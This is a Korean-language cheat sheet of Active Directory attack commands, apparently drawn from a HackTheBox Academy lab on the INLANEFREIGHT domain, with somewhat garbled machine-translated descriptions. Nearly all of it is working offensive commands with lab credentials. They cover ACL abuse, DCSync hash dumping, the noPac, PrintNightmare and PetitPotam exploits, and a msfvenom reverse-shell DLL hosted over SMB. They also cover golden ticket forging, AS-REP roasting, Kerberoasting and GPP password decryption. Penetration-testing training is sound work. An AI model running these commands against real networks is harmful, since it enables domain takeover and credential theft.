$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

PSCredential ObjectWindows 기반 호스트에서 를 생성하는 데 사용됩니다 .

$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force

SecureString ObjectWindows 기반 호스트에서 를 생성하는 데 사용됩니다 .

Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

damundsenWindows 기반 호스트에서 대상 Windows 도메인의 특정 사용자( )의 비밀번호를 변경하는 데 사용되는 PowerView 도구입니다 .

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members

Help Desk Level 1Windows 기반 호스트에서 대상 보안 그룹( )의 구성원을 보는 데 사용되는 PowerView 도구입니다 .

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

Windows 기반 호스트에서 대상 Windows 도메인의 damundsen특정 보안 그룹( )에 특정 사용자( )를 추가하는 데 사용되는 PowerView 도구입니다 .Help Desk Level 1

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

특정 보안 그룹( )의 구성원을 보고 Windows 기반 호스트에서 그룹의 Help Desk Level 1각 구성원( )의 사용자 이름만 출력하는 데 사용되는 PowerView 도구입니다.Select MemberName

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

PowerView 도구는 Windows 기반 호스트의 Service Principal Namesepecift 사용자( )에 대해 가짜를 생성하는 데 사용되었습니다 .adunn

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

Service Principal NameWindows 기반 호스트에서 공격 중에 생성된 가짜를 제거하는 데 사용되는 PowerView 도구입니다 .

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

Windows 기반 호스트의 damundsent특정 보안 그룹( )에서 특정 사용자( )를 제거하는 데 사용되는 PowerView 도구입니다 .Help Desk Level 1

ConvertFrom-SddlString

SDDL string읽을 수 있는 형식으로 변환하는 데 사용되는 PowerShell cmd-let입니다 . Windows 기반 호스트에서 수행됩니다.

DCSync

명령

설명

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol |fl

adunn대상 Windows 도메인에서 특정 사용자( )의 그룹 멤버십을 보는 데 사용되는 PowerView 도구입니다 . Windows 기반 호스트에서 수행됩니다.

$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

사용자 계정의 SID와 동일하게 설정되는 SID라는 변수를 만드는 데 사용됩니다. 그런 다음 PowerView 도구를 사용하여 Get-ObjectAcl특정 사용자의 복제 권한을 확인합니다. Windows 기반 호스트에서 수행됩니다.

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 -use-vss

대상 도메인 컨트롤러에 호스팅된 NTDS.dit 파일에서 NTLM 해시를 추출하고( 172.16.5.5) 추출된 해시를 파일( inlanefreight_hashes)에 저장하는 Impacket 도구 sed입니다. Linux 기반 호스트에서 수행됩니다.

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Windows 기반 호스트에서 공격을 Mimikatz수행하는 데 사용됩니다 .dcsync

특권 액세스

명령

설명

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

Windows 기반 호스트에서 Remote Desktop UsersWindows 대상( )의 그룹을 열거하는 데 사용되는 PowerView 기반 도구입니다 .-ComputerName ACADEMY-EA-MS01

Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

Windows 기반 호스트에서 Remote Management UsersWindows 대상( )의 그룹을 열거하는 데 사용되는 PowerView 기반 도구입니다 .-ComputerName ACADEMY-EA-MS01

$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force

Windows 기반 호스트에서 사용자의 $password비밀번호( )와 동일하게 설정된 변수( )를 생성합니다 .Klmcargo2

$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)

Windows 기반 호스트에서 대상 도메인 계정의 $cred사용자 이름( forend) 및 비밀번호( )와 동일하게 설정된 변수( )를 생성합니다 .$password

Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred

PowerShell cmd-let을 사용하여 Windows 기반 호스트에서 Enter-PSSession네트워크( )를 통해 대상과 PowerShell 세션을 설정합니다 . -ComputerName ACADEMY-EA-DB01이전에 표시된 2개의 명령( $cred& $password)으로 만든 자격 증명을 사용하여 인증합니다.

evil-winrm -i 10.129.201.234 -u forend

.NET을 사용하여 Linux 기반 호스트에서 Windows 대상과 PowerShell 세션을 설정하는 데 사용됩니다 WinRM.

Import-Module .\PowerUpSQL.ps1

도구 를 가져오는 데 사용됩니다 PowerUpSQL.

Get-SQLInstanceDomain

Windows 기반 호스트에서 SQL 서버 인스턴스를 열거하는 데 사용되는 PowerUpSQL 도구입니다.

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

SQL 서버에 연결하고 -query 'Select @@version'Windows 기반 호스트에서 버전( )을 쿼리하는 데 사용되는 PowerUpSQL 도구입니다.

mssqlclient.py

mssqlclient.pyLinux 기반 호스트에서 제공되는 기능과 옵션을 표시하는 데 사용되는 Impacket 도구입니다 .

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

Linux 기반 호스트에서 MSSQL 서버에 연결하는 데 사용되는 Impacket 도구입니다.

SQL> help

MSSQL 서버에 연결되면 mssqlclient.py 옵션을 표시하는 데 사용됩니다.

SQL> enable_xp_cmdshell

xp_cmdshell stored procedureLinux 기반 호스트에서 데이터베이스를 통해 OS 명령을 실행할 수 있도록 활성화하는 데 사용됩니다 .

xp_cmdshell whoami /priv

를 사용하여 시스템에 대한 권한을 열거하는 데 사용됩니다 xp_cmdshell.

노팍

명령

설명

sudo git clone https://github.com/Ridter/noPac.git

git을 사용하여 익스플로잇을 복제하는 데 사용됩니다 noPac. Linux 기반 호스트에서 수행됩니다.

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

대상 시스템이 Linux 기반 호스트에 취약한 scanner.py지 확인하기 위해 실행됩니다 .noPacSam_The_Admin

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

noPac/ 취약점을 악용 Sam_The_Admin하고 SYSTEM 쉘( -shell)을 얻는 데 사용됩니다. Linux 기반 호스트에서 수행됩니다.

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

noPac/ Sam_The_Admin취약점을 악용 하고 DCSyncLinux 기반 호스트의 도메인 컨트롤러에 내장된 관리자 계정에 대한 공격을 수행하는 데 사용됩니다.

인쇄악몽

명령

설명

git clone https://github.com/cube0x0/CVE-2021-1675.git

Linux 기반 호스트에서 git을 사용하여 PrintNightmare 익스플로잇을 복제하는 데 사용됩니다.

pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install

익스플로잇 작성자의 ( cube0x0) 버전의 Impacket이 설치되어 있는지 확인하는 데 사용됩니다. 그러면 Linux 기반 호스트에서 이전 Impacket 버전도 제거됩니다.

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

Windows 대상이 Linux 기반 호스트에서 노출 MS-PAR되었는지 확인하는 데 사용됩니다.MSRPRN

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll

셸 세션을 얻기 위해 익스플로잇에서 사용할 DLL 페이로드를 생성하는 데 사용됩니다. Windows 기반 호스트에서 수행됩니다.

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

CompDataSMB 서버를 생성하고 로컬 Linux 호스트의 지정된 위치에 공유 폴더( )를 호스팅하는 데 사용됩니다 . 이는 익스플로잇이 호스트에 다운로드를 시도하는 DLL 페이로드를 호스팅하는 데 사용될 수 있습니다. Linux 기반 호스트에서 수행됩니다.

sudo python3 CVE-2021-1675.py inlanefreight.local/<username>:<password>@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll'

익스플로잇을 실행하고 DLL 페이로드의 위치를 지정합니다. Linux 기반 호스트에서 수행됩니다.

쁘띠포탐

명령

설명

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

NTLM relay호스트 에 대한 웹 등록 URL을 지정하여 생성하는 데 사용되는 Impacket 도구입니다 Certificate Authority. Linux 기반 호스트에서 수행됩니다.

git clone https://github.com/topotam/PetitPotam.git

git을 사용하여 익스플로잇을 복제하는 데 사용됩니다 PetitPotam. Linux 기반 호스트에서 수행됩니다.

python3 PetitPotam.py 172.16.5.225 172.16.5.5

공격 호스트( 172.16.5.255)와 대상 도메인 컨트롤러( 172.16.5.5)의 IP 주소를 지정하여 PetitPotam 익스플로잇을 실행하는 데 사용됩니다. Linux 기반 호스트에서 수행됩니다.

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <base64 certificate> = dc01.ccache

.py를 사용하여 Linux 기반 호스트에서 gettgtpkinit도메인 컨트롤러( )에 대한 TGT 티켓을 요청합니다 .dc01.ccache

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

NTLM password hashesDCSync 공격을 수행하고 대상 Windows 도메인에서 하나 또는 전체를 검색하는 데 사용되는 Impacket 도구입니다 . Linux 기반 호스트에서 수행됩니다.

klist

krb5-user파일 의 내용을 보는 데 사용되는 명령입니다 ccache. Linux 기반 호스트에서 수행됩니다.

python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

getnthash.pyLinux 기반 호스트에서 TGS 요청을 제출하는 데 사용됩니다 .

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba

및 캡처된 해시( )를 NTDS.dit사용하여 해시를 추출하는 데 사용되는 Impacket 도구입니다 . Linux 기반 호스트에서 수행됩니다.DCSync attack-hashes

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /<base64 certificate>=/ptt

Rubeus를 사용하여 TGT를 요청하고 Windows 대상의 pass-the-ticket attack머신 계정( )을 사용하여 수행합니다. /user:ACADEMY-EA-DC01$Windows 기반 호스트에서 수행됩니다.

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt

를 사용하여 DCSync 공격을 수행합니다 Mimikatz. Windows 기반 호스트에서 수행됩니다.

기타 잘못된 구성

명령

설명

Import-Module .\SecurityAssessment.ps1

모듈을 가져오는 데 사용됩니다 Security Assessment.ps1. Windows 기반 호스트에서 수행됩니다.

Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

SecurityAssessment.ps1에 대한 Windows 대상을 열거하는 데 사용되는 기반 도구입니다 MS-PRN Printer bug. Windows 기반 호스트에서 수행됩니다.

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5

LDAPLinux 기반 호스트에서 DNS 영역의 모든 레코드를 확인하는 데 사용됩니다 .

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r

Linux 기반 호스트에서 A query( ) 를 수행하여 DNS 영역에서 알 수 없는 레코드를 확인하는 데 사용됩니다 .-r

Get-DomainUser * | Select-Object samaccountname,description

Select-ObjectWindows 기반 호스트의 대상 Windows 도메인에서 선택한 개체( )의 설명 필드를 표시하는 데 사용되는 PowerView 도구입니다 .

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Windows 기반 호스트에서 대상 Windows 도메인의 PASSWD_NOTREQD선택 개체( ) 설정을 확인하는 데 사용되는 PowerView 도구입니다 .Select-Object

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts

현재 로그온한 사용자의 컨텍스트에서 Windows 대상에 호스팅된 공유 내용을 나열하는 데 사용됩니다. Windows 기반 호스트에서 수행됩니다.

그룹 정책 열거 및 공격

명령

설명

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE

group policy preference passwordLinux 기반 호스트에서 캡처된 내용을 해독하는 데 사용되는 도구입니다 .

crackmapexec smb -L | grep gpp

group policy preference passwordusing 을 찾아 검색하고 CrackMapExec, 를 사용하여 출력을 필터링합니다 grep. Linux 기반 호스트에서 수행됩니다.

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

Linux 기반 호스트를 SYSVOL사용하여 Windows 대상의 공유 에 저장된 모든 자격 증명을 찾고 검색합니다 .CrackMapExec

Get-DomainGPO | select displayname

Windows 기반 호스트에서 대상 Windows 도메인의 GPO 이름을 열거하는 데 사용되는 PowerView 도구입니다.

Get-GPO -All | Select DisplayName

GPO 이름을 열거하는 데 사용되는 PowerShell cmd-let입니다. Windows 기반 호스트에서 수행됩니다.

$sid=Convert-NameToSid "Domain Users"

$sid도구 와 동일하게 설정되고 Convert-NameToSid그룹 계정을 지정하는 변수를 생성합니다 Domain Users. Windows 기반 호스트에서 수행됩니다.

Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid

Domain Users( eq $sid) 그룹이 하나 이상의 GPO에 대한 권한을 가지고 있는지 확인하는 데 사용되는 PowerView 도구입니다 . Windows 기반 호스트에서 수행됩니다.

Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

주어진 GPO의 이름을 표시하는 데 사용되는 PowerShell cmd-let입니다 GUID. Windows 기반 호스트에서 수행됩니다.

ASRE로스팅

명령

설명

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

DONT_REQ_PREAUTH대상 Windows 도메인의 사용자 계정에서 값을 검색하는 데 사용되는 PowerView 기반 도구입니다 . Windows 기반 호스트에서 수행됩니다.

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

linux, as-rep roasting

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Rubeus을 수행 ASEP Roasting attack하고 에 대한 출력 형식을 지정 하는 데 사용됩니다 Hashcat. Windows 기반 호스트에서 수행됩니다.

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

Hashcat단어 목록( )을 사용하여 캡처된 해시를 해독하려고 시도하는 데 사용됩니다 rockyou.txt. Linux 기반 호스트에서 수행됩니다.

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

대상 Windows 도메인의 사용자를 열거하고 ASKerberos 사전 인증이 필요하지 않은 사용자가 발견되면 자동으로 검색합니다. Linux 기반 호스트에서 수행됩니다.

신뢰 관계 - 하위 > 상위 신뢰

명령

설명

Import-Module activedirectory

모듈 을 가져오는 데 사용됩니다 Active Directory. Windows 기반 호스트에서 수행됩니다.

Get-ADTrust -Filter *

대상 Windows 도메인의 신뢰 관계를 열거하는 데 사용되는 PowerShell cmd-let입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainTrust

대상 Windows 도메인의 신뢰 관계를 열거하는 데 사용되는 PowerView 도구입니다. Windows 기반 호스트에서 수행됩니다.

Get-DomainTrustMapping

Windows 기반 호스트에서 도메인 신뢰 매핑을 수행하는 데 사용되는 PowerView 도구입니다.

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

Windows 기반 호스트에서 대상 하위 도메인의 사용자를 열거하는 데 사용되는 PowerView 도구입니다.

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

Mimikatz를 사용하여 Windows 기반 호스트에서 KRBTGT계정을 얻습니다 .NT Hash

Get-DomainSID

Windows 기반 호스트에서 대상 하위 도메인에 대한 SID를 가져오는 데 사용되는 PowerView 도구입니다.

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

Enterprise AdminsWindows 기반 호스트에서 그룹의 SID를 얻는 데 사용되는 PowerView 도구입니다 .

ls \\academy-ea-dc01.inlanefreight.local\c$

대상 도메인 컨트롤러에 있는 C 드라이브의 내용을 나열하는 데 사용됩니다. Windows 기반 호스트에서 수행됩니다.

mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

Windows 기반 호스트에서 Mimikatz를 생성하는 데 사용됩니다 .Golden Ticket

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Windows 기반 호스트에서 Rubeus를 생성하는 데 사용됩니다 .Golden Ticket

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm

MimikatzWindows 기반 호스트에서 DCSync 공격을 수행하는 데 사용됩니다 .

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Linux 기반 호스트에서 DCSync 공격을 수행하는 데 사용되는 Impacket 도구입니다.

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240

SID Brute forcingLinux 기반 호스트에서 공격을 수행하는 데 사용되는 Impacket 도구입니다 .

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

Linux 기반 호스트에서 대상 Windows 도메인의 SID를 검색하는 데 사용되는 Impacket 도구입니다.

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

대상 Windows 도메인을 검색 하고 이를 Linux 기반 호스트에서 SIDEnterprise Admin 그룹에 연결하는 데 사용되는 Impacket 도구입니다.RID

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Golden TicketLinux 기반 호스트에서 를 생성하는 데 사용되는 Impacket 도구입니다 .

export KRB5CCNAME=hacker.ccache

KRB5CCNAME Environment VariableLinux 기반 호스트에서 설정하는 데 사용됩니다 .

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Linux 기반 호스트에서 대상 도메인 컨트롤러와의 셸 세션을 설정하는 데 사용되는 Impacket 도구입니다.

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

하위 도메인에서 상위 도메인으로 확대되는 공격을 자동으로 수행하는 Impacket 도구입니다.

신뢰 관계 - 포리스트 간

명령

설명

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

SPNsWindows 기반 호스트에서 연결된 계정을 열거하는 데 사용되는 PowerView 도구입니다 .

Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof

mssqlsvcWindows 기반 호스트에서 계정을 열거하는 데 사용되는 PowerView 도구입니다 .

.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Windows 기반 호스트에서 Rubeus대상 Windows 도메인( )에 대해 Kerberoasting 공격을 수행하는 데 사용됩니다 ./domain:FREIGHTLOGISTICS.local

Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

Windows 기반 호스트에서 도메인에 속하지 않은 사용자로 그룹을 열거하는 데 사용되는 PowerView 도구입니다.

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

Windows 기반 호스트에서 대상 Windows 시스템에 원격으로 연결하는 데 사용되는 PowerShell cmd-let입니다.

GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Linux 기반 호스트에서 -request대상 Windows 도메인( )에 있는 계정의 TGS 티켓을 요청( )하는 데 사용되는 Impacket 도구입니다 .-target-domain

bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

BloodHoundLinux 기반 호스트에서 대상 Windows 도메인 에 대해 Python 구현을 실행합니다 .

zip -r ilfreight_bh.zip *.json

여러 파일을 하나의 단일 .zip파일로 압축하여 BloodHound GUI에 업로드하는 데 사용됩니다.

PreviousActive Directory 방법론 Next커버로스팅

Last updated 1 year ago